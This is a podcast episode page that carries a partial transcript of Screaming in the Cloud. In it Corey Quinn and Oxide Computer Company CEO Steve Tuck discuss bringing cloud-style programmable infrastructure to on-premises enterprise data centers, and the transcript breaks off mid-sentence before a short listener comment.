Steve Tuck, Co-Founder & CEO of Oxide Computer Company, joins Corey on Screaming in the Cloud to discuss his work to make modern computers cloud-friendly. Steve describes what it was like going through early investment rounds, and the difficult but important decision he and his co-founder made to build their own switch. Corey and Steve discuss the demand for on-prem computers that are built for cloud capability, and Steve reveals how Oxide approaches their product builds to ensure the masses can adopt their technology wherever they are. About SteveSteve is the Co-founder & CEO of Oxide Computer Company.  He previously was President & COO of Joyent, a cloud computing company acquired by Samsung.  Before that, he spent 10 years at Dell in a number of different roles. Links Referenced: Oxide Computer Company: On The Metal Podcast: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: This episode is brought to us in part by our friends at RedHat. As your organization grows, so does the complexity of your IT resources. You need a flexible solution that lets you deploy, manage, and scale workloads throughout your entire ecosystem. The Red Hat Ansible Automation Platform simplifies the management of applications and services across your hybrid infrastructure with one platform. Look for it on the AWS Marketplace.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. You know, I often say it—but not usually on the show—that Screaming in the Cloud is a podcast about the business of cloud, which is intentionally overbroad so that I can talk about basically whatever the hell I want to with whoever the hell I’d like. Today’s guest is, in some ways of thinking, about as far in the opposite direction from Cloud as it’s possible to go and still be involved in the digital world. Steve Tuck is the CEO at Oxide Computer Company. You know, computers, the things we all pretend aren’t underpinning those clouds out there that we all use and pay by the hour, gigabyte, second-month-pound or whatever it works out to. Steve, thank you for agreeing to come back on the show after a couple years, and once again suffer my slings and arrows.Steve: Much appreciated. Great to be here. It has been a while. I was looking back, I think three years. This was like, pre-pandemic, pre-interest rates, pre… Twitter going totally sideways.Corey: And I have to ask to start with that, it feels, on some level, like toward the start of the pandemic, when everything was flying high and we’d had low interest rates for a decade, that there was a lot of… well, lunacy lurking around in the industry, my own business saw it, too. It turns out that not giving a shit about the AWS bill is in fact a zero interest rate phenomenon. And with all that money or concentrated capital sloshing around, people decided to do ridiculous things with it. I would have thought, on some level, that, “We’re going to start a computer company in the Bay Area making computers,” would have been one of those, but given that we are a year into the correction, and things seem to be heading up into the right for you folks, that take was wrong. How’d I get it wrong?Steve: Well, I mean, first of all, you got part of it right, which is there were just a litany of ridiculous companies and projects and money being thrown in all directions at that time.Corey: An NFT of a computer. We’re going to have one of those. That’s what you’re selling, right? Then you had to actually hard pivot to making the real thing.Steve: That’s it. So, we might as well cut right to it, you know. This is—we went through the crypto phase. But you know, our—when we started the company, it was yes, a computer company. It’s on the tin. It’s definitely kind of the foundation of what we’re building. But you know, we think about what a modern computer looks like through the lens of cloud.I was at a cloud computing company for ten years prior to us founding Oxide, so was Bryan Cantrill, CTO, co-founder. And, you know, we are huge, huge fans of cloud computing, which was an interesting kind of dichotomy. Instead of conversations when we were raising for Oxide—because of course, Sand Hill is terrified of hardware. And when we think about what modern computers need to look like, they need to be in support of the characteristics of cloud, and cloud computing being not that you’re renting someone else’s computers, but that you have fully programmable infrastructure that allows you to slice and dice, you know, compute and storage and networking however software needs. And so, what we set out to go build was a way for the companies that are running on-premises infrastructure—which, by the way, is almost everyone and will continue to be so for a very long time—access to the benefits of cloud computing. And to do that, you need to build a different kind of computing infrastructure and architecture, and you need to plumb the whole thing with software.Corey: There are a number of different ways to view cloud computing. And I think that a lot of the, shall we say, incumbent vendors over in the computer manufacturing world tend to sound kind of like dinosaurs, on some level, where they’re always talking in terms of, you’re a giant company and you already have a whole bunch of data centers out there. But one of the magical pieces of cloud is you can have a ridiculous idea at nine o’clock tonight and by morning, you’ll have a prototype, if you’re of that bent. And if it turns out it doesn’t work, you’re out, you know, 27 cents. And if it does work, you can keep going and not have to stop and rebuild on something enterprise-grade.So, for the small-scale stuff and rapid iteration, cloud providers are terrific. Conversely, when you wind up in the giant fleets of millions of computers, in some cases, there begin to be economic factors that weigh in, and for some on workloads—yes, I know it’s true—going to a data center is the economical choice. But my question is, is starting a new company in the direction of building these things, is it purely about economics or is there a capability story tied in there somewhere, too?Steve: Yeah, it’s actually economics ends up being a distant third, fourth, in the list of needs and priorities from the companies that we’re working with. When we talk about—and just to be clear we’re—our demographic, that kind of the part of the market that we are focused on are large enterprises, like, folks that are spending, you know, half a billion, billion dollars a year in IT infrastructure, they, over the last five years, have moved a lot of the use cases that are great for public cloud out to the public cloud, and who still have this very, very large need, be it for latency reasons or cost reasons, security reasons, regulatory reasons, where they need on-premises infrastructure in their own data centers and colo facilities, et cetera. And it is for those workloads in that part of their infrastructure that they are forced to live with enterprise technologies that are 10, 20, 30 years old, you know, that haven’t evolved much since I left Dell in 2009. And, you know, when you think about, like, what are the capabilities that are so compelling about cloud computing, one of them is yes, what you mentioned, which is you have an idea at nine o’clock at night and swipe a credit card, and you’re off and running. And that is not the case for an idea that someone has who is going to use the on-premises infrastructure of their company. And this is where you get shadow IT and 16 digits to freedom and all the like.Corey: Yeah, everyone with a corporate credit card winds up being a shadow IT source in many cases. If your processes as a company don’t make it easier to proceed rather than doing it the wrong way, people are going to be fighting against you every step of the way. Sometimes the only stick you’ve got is that of regulation, which in some industries, great, but in other cases, no, you get to play Whack-a-Mole. I’ve talked to too many companies that have specific scanners built into their mail system every month looking for things that look like AWS invoices.Steve: [laugh]. Right, exactly. And so, you know, but if you flip it around, and you say, well, what if the experience for all of my infrastructure that I am running, or that I want to provide to my software development teams, be it rented through AWS, GCP, Azure, or owned for economic reasons or latency reasons, I had a similar set of characteristics where my development team could hit an API endpoint and provision instances in a matter of seconds when they had an idea and only pay for what they use, back to kind of corporate IT. And what if they were able to use the same kind of developer tools they’ve become accustomed to using, be it Terraform scripts and the kinds of access that they are accustomed to using? How do you make those developers just as productive across the business, instead of just through public cloud infrastructure?At that point, then you are in a much stronger position where you can say, you know, for a portion of things that are, as you pointed out, you know, more unpredictable, and where I want to leverage a bunch of additional services that a particular cloud provider has, I can rent that. And where I’ve got more persistent workloads or where I want a different economic profile or I need to have something in a very low latency manner to another set of services, I can own it. And that’s where I think the real chasm is because today, you just don’t—we take for granted the basic plumbing of cloud computing, you know? Elastic Compute, Elastic Sto
Comments (1)

Felipe Alvarez

it seems the volume changes from high to low every few seconds. please fix?

Jun 10th
Download from Google Play
Download from App Store